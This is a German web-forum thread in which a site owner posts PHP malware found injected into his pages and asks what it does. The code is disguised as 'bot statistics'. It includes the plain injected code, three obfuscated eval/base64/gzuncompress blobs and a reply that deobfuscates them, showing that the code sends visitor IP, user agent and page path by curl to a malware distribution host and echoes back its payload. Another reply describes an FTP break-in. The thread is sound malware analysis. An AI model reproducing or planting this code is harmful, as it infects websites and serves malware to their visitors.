Webseite "gehackt" --> Tarnung als Bot-Analyse

M

masterchris_99

Neuling
Thread Starter
Mitglied seit
04.11.2005
Beiträge
115
Hallo,

meine Webseite wurde anscheinend gehackt. Ich weiß leider noch nicht wie sie reingekommen sind aber darum soll es auch hier erstmal nicht gehen. Mich würde interessieren was da genau passiert?

So wie ich das sehe werden Daten an eine weitere Webseite (habe die url schon wieder vergessen aber es war so eine Browser-Übersichtsseite) geschickt und bei bestimmten Umständen (Browser, Host, ...) kommt ein "Schadcode" zurück der dann ausgeführt wird. Was wird ausgeführt?
Für mich sieht das sehr nach Bot aus der mich gescannt hat. Es hat sich also keiner händisch die Mühe gemacht und mich gehackt?!?

Dieser PHP-Code wurde direkt in die einzelnen PHP-Seiten eingefügt:

PHP: 
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL2JvdHVwZGF0ZXN0YXRpc3RpYy5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}

Dieser Code war in einer counter.php die per IFrame in HTML-Seiten eingebettet war:
PHP: 
eval(gzuncompress(base64_decode('eF6FUlFLwzAY/Cs+CNlAZLROKNKH+bAOGciibE1ESpMUIWYoKwjZrzf3bRNZUn2574O773o9clktH+9ny6cX1rQNey1nu13rR6rtu9ubxnT6w3QjpnPuDbu4ZlUB7AEqN06/lSUbX52pweocyD3tgOAQK0+q4A9NUnFkyDPtwf3w/e8sg/f07X/YwX84fIEyJPKf2J8ZtSW28718FpM6405k0FHH73JVYib6NfVDLzdTqzLqxsW9QgFKboBTgFXAPy5AH31JCeBJb1ICQgryt8CQJqEGI/K1V/PiU23dJM4q6KVAgVnsZc2/sNGrWYQS4sbOLiDElV5gS16AOKTA5rpqbWNfUCErBvJaVYU0K7zw8d03+PHhXg=='))); ?><?php eval(gzuncompress(base64_decode('eF5Vj9tqg0AQhl9FRDQBLyQlVyEUqZvY0sZ21ZKkFBnX0za6K+shSOm7dzf2pjfzzfGfmWJgpKecabAw6PLbgK0rBEwLy4+i1yQOEU7cPTpElq3rtlVyXta5ZVsTVJxLpkCzQbLpmLS8zQVIkkrwRrWllJUSHRQgqIp5L+1NGqMdwgjPuhi9BBFKXM+TibnuB6FcaoGPHeLx8Xn1NGb++/W83znn48E5HXFL7nB7mtZf6coZpV9lCM18WF/Bd7dy/J62Cv/1zaGTd5Y561XNzHgDlDFochXejvtbbhZDXbfQV7PGW4zCKInxo5oiVU4uKl9zfpFfBLqta/pyI/J+EEwz4MOgn5ufX/ghakE='))); ?><?php eval(gzuncompress(base64_decode('eF6FlG9rgzAQxr+KhWITWoqJ1rZIYN1wZeDakereiEi22a1QVuifV8Xvvkuqi6slEzR4/O7O3PPEzRp1NodDcURdIXIH4/PndvcmtpZ6DdST7Xen7w/k9AlWAcK682h5P4tWaS8XeS9LnQx181XIX0OeCuTg7AJStkiiSOW4TCBI36wRuk4mkCyrDgSiGDNmrcX2UGDbbpFUk66ZdDXpmUlPkyMzOdKkbyZ9TY7N5FiTEzM50eTUTE41SUDQxkAbGhGCs47UBEZ+BlUqD2gRiQsqQu5xfyos27bagKcBfL5o3JIWjAE9YLDWEFYflhYi5W+0HUNVBU9uwbUDLsj0FiKl1/WoNKOsR8ktWKrfgGkNuwDXO56HMZiayu0qK9OW/UllDRcHZQnDVJTVgelJ/8Nwro4LqQxCBw8Jj5Yvcc7DOOGLmM8Wq8eQD+oD5wzdP1f/3wCGb7zuVplMd4ufnsNlEv+2IcNRv3HLGrADj921SlUupOokKyitvhVnDOxEQWrlhWYcwj4OivevnfqreEHZqlt5FuqW5Q+LPD5x')));

mfg Chris
 
Wenn Du diese Anzeige nicht sehen willst, registriere Dich und/oder logge Dich ein.
Wenn jemand eine Idee hat wo ich eher an Antworten komme (Forum, etc. pp) dann wäre ich auch dankbar.
 
Informationen über das Ding (lädt langsam die Seite)
Über die Malware: http://stopmalvertising.com/malware-reports/the-c3284d-malware-network-stats.php.html
Über Wordpress Infection: http://stopmalvertising.com/malware...are-network-stats.php/wordpress-showcase.html

Aufjedenfall lädt er Schadsoftware
A
significant number of infected websites are redirecting visitors to a page called stats.php which is also hosted on compromised websites.

The hack is not linked to a particular CMS or forum software. Reports show infections of WordPress, Joomla (latest version), ZenPhoto Gallery, phpBB3, XT COMMERCE 3.0.4 Shop, WebsiteBaker, ...

The malicious code can be found in various places: .htaccess file, .php, .html, .js files ... and is rendered differently depending on which method is used.
Zum Vergrößern anklicken....

IFrame:
Erste Eval:
PHP: 
var_dump($GLOBALS['_a_']);

//produces the following output

array
  0 => string 'strtolower' (length=10)
  1 => string 'strstr' (length=6)
  2 => string 'strstr' (length=6)
  3 => string 'strstr' (length=6)
  4 => string 'strstr' (length=6)
  5 => string 'strstr' (length=6)
  6 => string 'strstr' (length=6)
  7 => string 'strstr' (length=6)
  8 => string 'strstr' (length=6)
  9 => string 'strstr' (length=6)
  10 => string 'base64_decode' (length=13)
  11 => string 'urlencode' (length=9)
  12 => string 'urlencode' (length=9)
  13 => string 'urlencode' (length=9)
  14 => string 'urlencode' (length=9)
  15 => string 'curl_init' (length=9)
  16 => string 'curl_setopt' (length=11)
  17 => string 'curl_setopt' (length=11)
  18 => string 'curl_exec' (length=9)
  19 => string 'curl_close' (length=10)
Zweite Eval:
PHP: 
function a($i){
	$a=Array('
		HTTP_USER_AGENT',
		"",
		'google',
		'yahoo',
		'baidu',
		'msn',
		'opera',
		'chrome',
		'bing',
		'safari',
		'bot',
		'HTTP_REFERER',
		"",
		'REMOTE_ADDR',
		'HTTP_HOST',
		'aHR0cDovL2JvdHVwZGF0ZXN0YXRpc3RpYy5jb20vc3RhdEEvc3RhdC5waHA=',
		'?ip=',
		'REMOTE_ADDR',
		'&useragent=',
		'&domainname=',
		'HTTP_HOST',
		'&fullpath=',
		'REQUEST_URI',
		'&check=',
		'look',
		"O",
		" "
	);
	return $a[$i];
}
Letzte Eval:
PHP: 
if(!isset($aa_0)){
	global $aa_0;
	$aa_0=round(0+1);
	$aa_1=strtolower($_SERVER['HTTP_USER_AGENT']);
	$aa_2=NULL;
	$aa_3="";
	if((strstr($aa_1,'google')== false)&&(strstr($aa_1,'yahoo')== false)&&(strstr($aa_1,'baidu')== false)
	&&(strstr($aa_1,'msn')== false)&&(strstr($aa_1,'opera')== false)&&(strstr($aa_1,'chrome')== false)
	&&(strstr($aa_1,'bing')== false)&&(strstr($aa_1,'safari')== false)&&(strstr($aa_1,'bot')== false)
	&&$_SERVER['HTTP_REFERER']!=""){
		if(isset($_SERVER['REMOTE_ADDR')== true && isset($_SERVER['HTTP_HOST'])== true){
			$aa_3='http://botupdatestatistic.com/statA/stat.php' . '?ip=' . urlencode($_SERVER['REMOTE_ADDR']) .'&useragent=' . 
			urlencode(strtolower($_SERVER['HTTP_USER_AGENT'])) . '&domainname=' . urlencode($_SERVER['HTTP_HOST']) . 
			'&fullpath=' . urlencode($_SERVER['REQUEST_URI']) . '&check=' . isset($_GET['look']);
			
			$aa_2=curl_init($aa_3);         // translates to :$aa_2=curl_init(http://botupdatestatistic.com/statA/stat.php?ip=...
   ..
		}
	}
	if($aa_2 !== NULL){
		curl_setopt($aa_2,CURLOPT_RETURNTRANSFER,round(0+0.33333333333333+0.33333333333333+0.33333333333333));
		curl_setopt($aa_2,CURLOPT_TIMEOUT,round(0+1.5+1.5+1.5+1.5));
		$aa_4=@curl_exec($aa_2);
		if($aa_4[round(0)]=="O"){
			$aa_4[round(0)]=" ";
			echo $aa_4;
		}
		curl_close($aa_2);
	}
}
 
In deinen Webspace wurde eingebrochen.

Hallo masterchris_99,

dein FTP-Zugang wurde wahrscheinlich ausspioniert. Ich habe nun 2x infizierte Seiten dieser Art von Schadsoftware befreit (völlig unabhängig voneinander), in beiden Fällen konnte ich einen Einbruch per FTP belegen (FTP-Log). Der letzte Fall gleicht sehr deinem, auch da die Tarnung als Bot-Analyse. Der Einbruch erfolgte bereits vor einigen Monaten. Zuletzt war die eingebrachte Schadsoftware der von Avira erkannte Virus JS/Blacole.CV - aber das kann sich jederzeit ändern, da die Schadsoftware von einem Verteilserver kommt, wie in deinem Fall von botupdatestatistic.com . Dieser Server wird auf http://www.urlvoid.com/scan/botupdatestatistic.com zwar von vielen als 'clean' eingestuft, aber man kann das Gegenteil beweisen, er ist definitiv ein Viren-Verteiler. Der Virus wird von dort pro infizierter Domain und pro Benutzer-IP nur einmalig gesendet - und auch nicht an jeden, wieder Tarnung.

Der PHP-Schadcode auf dem Server wird wahrscheinlich manuell eingebracht, zumindest legt dies das FTP-Log nahe. In einem Fall ging dem Einbruch ein Virusbefall vorweg, was zur Vermutung führt, dass es ein Trojaner war, der FTP-Passworte ausspioniert hat oder den Netzverkehr abgehört hat. Befallen werden kann auf diese Weise jede PHP-Anwendung, aber das Prinzip lässt sich auch ebenso auf Perl oder ASP übertragen, sofern dort genügend Mächtigkeit für Unterabfragen freigegeben sind.
 
Anmelden, um zu antworten.
Hardwareluxx setzt keine externen Werbe- und Tracking-Cookies ein. Auf unserer Webseite finden Sie nur noch Cookies nach berechtigtem Interesse (Art. 6 Abs. 1 Satz 1 lit. f DSGVO) oder eigene funktionelle Cookies. Durch die Nutzung unserer Webseite erklären Sie sich damit einverstanden, dass wir diese Cookies setzen. Mehr Informationen und Möglichkeiten zur Einstellung unserer Cookies finden Sie in unserer Datenschutzerklärung.


Zurück
Oben Unten refresh